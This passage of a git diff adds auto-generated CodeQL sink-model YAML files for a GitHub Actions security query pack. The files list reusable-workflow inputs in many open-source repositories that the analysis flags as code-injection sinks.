+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "inputs.job_status", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml
new file mode 100644
index 000000000000..acf43426e564
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.run", "code-injection", "generated"]
+ - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.ruby-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml
new file mode 100644
index 000000000000..3c9178a91258
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.latest", "code-injection", "generated"]
+ - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.tag", "code-injection", "generated"]
+ - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "inputs.self_hosted", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml
new file mode 100644
index 000000000000..24603c25a777
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.ignore_test_status", "code-injection", "generated"]
+ - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.test_filter", "code-injection", "generated"]
+ - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.browser_filter", "code-injection", "generated"]
+ - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.pr", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml
new file mode 100644
index 000000000000..29f01c24bedd
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "inputs.package_installation_command", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml
new file mode 100644
index 000000000000..acad489dbe51
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "inputs.arch", "code-injection", "generated"]
+ - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "inputs.arch", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml
new file mode 100644
index 000000000000..e15b6d33042f
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "inputs.option", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml
new file mode 100644
index 000000000000..12c9f97b7a40
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "inputs.commit", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml
new file mode 100644
index 000000000000..685944420aaa
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.version", "code-injection", "generated"]
+ - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.branch", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml
new file mode 100644
index 000000000000..884c3d154ad7
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "inputs.verSion", "code-injection", "generated"]
+ - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "inputs.verSion", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml
new file mode 100644
index 000000000000..799958a7feef
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml
new file mode 100644
index 000000000000..32d3e59e1f8c
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.marks", "code-injection", "generated"]
+ - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.python-version", "code-injection", "generated"]
+ - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "inputs.dbt-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml
new file mode 100644
index 000000000000..f2893eb24070
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
+ - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
+ - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.user", "code-injection", "generated"]
+ - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml
new file mode 100644
index 000000000000..ea3b2029f822
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.patch", "code-injection", "generated"]
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.minor", "code-injection", "generated"]
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.major", "code-injection", "generated"]
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.preName", "code-injection", "generated"]
+ - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.pre", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
new file mode 100644
index 000000000000..74bdcb807c88
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml
new file mode 100644
index 000000000000..4c0442abd2b5
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["supabase/auth/.github/workflows/publish.yml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml
new file mode 100644
index 000000000000..39c81d39066c
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "inputs.image", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
new file mode 100644
index 000000000000..82f5ba4be74d
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"]
+ - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
+ - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"]
+ - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml
new file mode 100644
index 000000000000..ffb08a8fa2e9
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.map", "code-injection", "generated"]
+ - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.minor", "code-injection", "generated"]
+ - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.major", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml
new file mode 100644
index 000000000000..4012908e7e9a
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "inputs.fuzzing_duration_s", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml
new file mode 100644
index 000000000000..a1af8280ebc7
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "inputs.target", "code-injection", "generated"]
+ - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "inputs.manifest_name", "code-injection", "generated"]
+ - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "inputs.arch", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml
new file mode 100644
index 000000000000..84de5681fea5
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "inputs.asan", "code-injection", "generated"]
+ - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "inputs.ref", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml
new file mode 100644
index 000000000000..c9e8b5c23c0f
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "inputs.flavor", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml
new file mode 100644
index 000000000000..80dde7f2fc0e
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "inputs.crate", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml
new file mode 100644
index 000000000000..1ffaa4e1cd0f
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "inputs.ipv8-git-ref", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml
new file mode 100644
index 000000000000..48b35d83c702
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.framework", "code-injection", "generated"]
+ - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.configuration", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml
new file mode 100644
index 000000000000..e1a0c8a9fcf3
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "inputs.pytest_markers", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml
new file mode 100644
index 000000000000..71cd3fed3ed4
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.pace", "code-injection", "generated"]
+ - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.next", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
new file mode 100644
index 000000000000..47f53f495f83
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.server_id", "code-injection", "generated"]
+ - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.secondary_tests", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
new file mode 100644
index 000000000000..1b592aa91cc4
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "inputs.hz", "code-injection", "generated"]
+ - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "inputs.hz", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
new file mode 100644
index 000000000000..db4e957a87a3
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "inputs.workspace", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
new file mode 100644
index 000000000000..c3642c84f631
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml new file mode 100644 index 000000000000..3e6691f0e8f7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml new file mode 100644 index 000000000000..733c2e20a719 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml new file mode 100644 index 000000000000..cb80f74e4e89 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml new file mode 100644 index 000000000000..0f78ea086a6c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml 
@@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", 
"inputs.packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml new file mode 100644 index 000000000000..e2bf8f96fa95 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "inputs.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml new file mode 100644 index 000000000000..4a8500a147eb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "inputs.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml new file mode 100644 index 000000000000..3e362cebc584 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml new file mode 100644 index 000000000000..9e5f6e3541e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "inputs.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "inputs.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "inputs.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml new file mode 100644 index 000000000000..89fbb5dbf700 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml 
